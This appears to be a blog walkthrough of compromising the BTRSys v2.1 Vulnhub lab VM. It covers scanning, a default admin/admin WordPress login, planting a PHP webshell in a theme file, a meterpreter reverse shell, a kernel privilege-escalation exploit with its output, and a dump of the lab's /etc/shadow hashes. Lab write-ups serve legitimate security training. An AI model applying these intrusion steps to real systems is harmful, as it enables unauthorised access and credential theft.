OK one last Vulnhub VM for today, this time is the second in the series: Resimler: BTRSys v2.1, This one is a bit more difficult than the previous, but only marginally.
Getting this VM up and running is a pain, first time I tried to import it in vmware it complained about the vmdk, it’s a simple fix, the name is wrong in the .ova, simply open it in a text editor and rename the file it is looking for to the correct one.
First things first, a portscan.. we get the following:
21 – vsftpd 3.0.3
22 – OpenSSH 7.2p2 Ubuntu 4ubuntu2.1
80 – Apache httpd 2.4.18
Again FTP allows anonymous login but nothing there.
Loading the webapp in a browser we are greeted with a gif of a snake but not much else. Examining robots.txt gives us /wordpress/.
So I kick off the usual tools, wpscan, nikto and dirb (with seclists big.txt).
Nikto doesn’t give much useful information, and the best dirb gives is /upload/ which simply reply’s with:
Connection failed: SQLSTATE[HY000]  Unknown database ‘Lepton’
WPscan however lists a whole host of issues, here is a snippet of what I found:
[!] The WordPress 'http://192.168.1.144/wordpress/readme.html' file exists exposing a version number [+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu) [+] XML-RPC Interface available under: http://192.168.1.144/wordpress/xmlrpc.php [!] Upload directory has directory listing enabled: http://192.168.1.144/wordpress/wp-content/uploads/ [!] Includes directory has directory listing enabled: http://192.168.1.144/wordpress/wp-includes/ [+] WordPress version 3.9.14 (Released on 2016-09-07) identified from advanced fingerprinting, meta generator, readme, links opml, stylesheets numbers - loads of vulns as old version - [+] Identified the following 2 user/s: +----+--------+--------+ | Id | Login | Name | +----+--------+--------+ | 1 | btrisk | btrisk | | 2 | admin | admin | +----+--------+--------+
I try both usernames with the username as the password and log in with the username/password of admin/admin. That was surprisingly easy!
Once in I used the “edit themes” option to edit “content-audio.php” to contain the b374k php webshell. I visited the url in a browser and was greeted with a webshell. from there I pulled the wp-config.php
define('DB_NAME', 'wordpress'); define('DB_USER', 'root'); define('DB_PASSWORD', 'rootpassword!'); define('DB_HOST', 'localhost');
And /etc/password file which turned out to ultimately be no use. After realizing that python wasn’t installed I uploaded LinEnum.sh to /tmp, chmoded it and ran to get the following:
Linux version 4.4.0-62-generic (buildd@lcy01-30) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) DISTRIB_ID=Ubuntu DISTRIB_RELEASE=16.04 DISTRIB_CODENAME=xenial DISTRIB_DESCRIPTION="Ubuntu 16.04.2 LTS"
Running out of ideas I uploaded a meterpreter reverse shell and launched. from there I could spawn a shell using: /usr/bin/python3.5 -c ‘import pty; pty.spawn(“/bin/sh”)’
There didn’t seem to be any suid binaries to exploit so I did a quick google for kernal exploits which led me to: https://www.exploit-db.com/exploits/41458/
The machine didn’t have GCC installed and the version I did find on it I didn’t have permissions to use. So compile that locally, upload. Then ran the following:
$ chmod +x pwn chmod +x pwn $ ./pwn ./pwn [.] namespace sandbox setup successfully [.] disabling SMEP & SMAP [.] scheduling 0xffffffff81064550(0x406e0) [.] waiting for the timer to execute [.] done [.] SMEP & SMAP should be off now [.] getting root [.] executing 0x55e02688defd [.] done [.] should be root now [.] checking if we got root [+] got r00t ^_^ [!] don't kill the exploit binary, the kernel will crash root@ubuntu:/tmp#
And that is game over 🙂
Again there was no flag in /root so I grabbed the shadow files as proof. I haven’t cracked the hashes as I don’t see the point already having a root shell.
root@ubuntu:/root# ls -la ls -la total 32 drwx------ 4 root root 4096 Apr 28 02:24 . drwxr-xr-x 22 root root 4096 Mar 17 2017 .. -rw------- 1 root root 505 May 2 08:57 .bash_history -rw-r--r-- 1 root root 3106 Oct 22 2015 .bashrc drwx------ 2 root root 4096 Apr 28 02:24 .cache -rw------- 1 root root 215 Apr 27 12:11 .mysql_history drwxr-xr-x 2 root root 4096 Mar 21 2017 .nano -rw-r--r-- 1 root root 148 Aug 17 2015 .profile root@ubuntu:/root# cat /etc/shadow cat /etc/shadow root:$6$pYiSm10w$A7g2nH1EXRcIZxLgE3gRR.F.Rlq0gSpyWMqQjD/19U4s2xjtbNsiw.PV1Fevp23QOOj5tEm8CFGqagoodunMG.:17284:0:99999:7::: daemon:*:17212:0:99999:7::: bin:*:17212:0:99999:7::: sys:*:17212:0:99999:7::: sync:*:17212:0:99999:7::: games:*:17212:0:99999:7::: man:*:17212:0:99999:7::: lp:*:17212:0:99999:7::: mail:*:17212:0:99999:7::: news:*:17212:0:99999:7::: uucp:*:17212:0:99999:7::: proxy:*:17212:0:99999:7::: www-data:$6$reqtjqmt$mDDXv45UPmRm7bwQYICkDFiVvGTLGaJyX.w16Sg7PNY9xMwlhIwebUSgF0hGjgKo1ku9IyfX0YdqDQHhBELZ2.:17283:0:99999:7::: backup:*:17212:0:99999:7::: list:*:17212:0:99999:7::: irc:*:17212:0:99999:7::: gnats:*:17212:0:99999:7::: nobody:*:17212:0:99999:7::: systemd-timesync:*:17212:0:99999:7::: systemd-network:*:17212:0:99999:7::: systemd-resolve:*:17212:0:99999:7::: systemd-bus-proxy:*:17212:0:99999:7::: syslog:*:17212:0:99999:7::: _apt:*:17212:0:99999:7::: messagebus:*:17242:0:99999:7::: uuidd:*:17242:0:99999:7::: btrisk:$6$pR7v.zmh$RGoeByixIOkiz8haCi3nFN2l8VtT/VjPJo6nO1jmpKdBbHcL6FMdb09Uq51sjY0M/HVZ8xF9lNjAHEoe1jAzn.:17284:0:99999:7::: mysql:!:17242:0:99999:7::: ftp:*:17245:0:99999:7::: sshd:*:17246:0:99999:7:::
Thanks for another fun Boot2Root @ismailonderkaya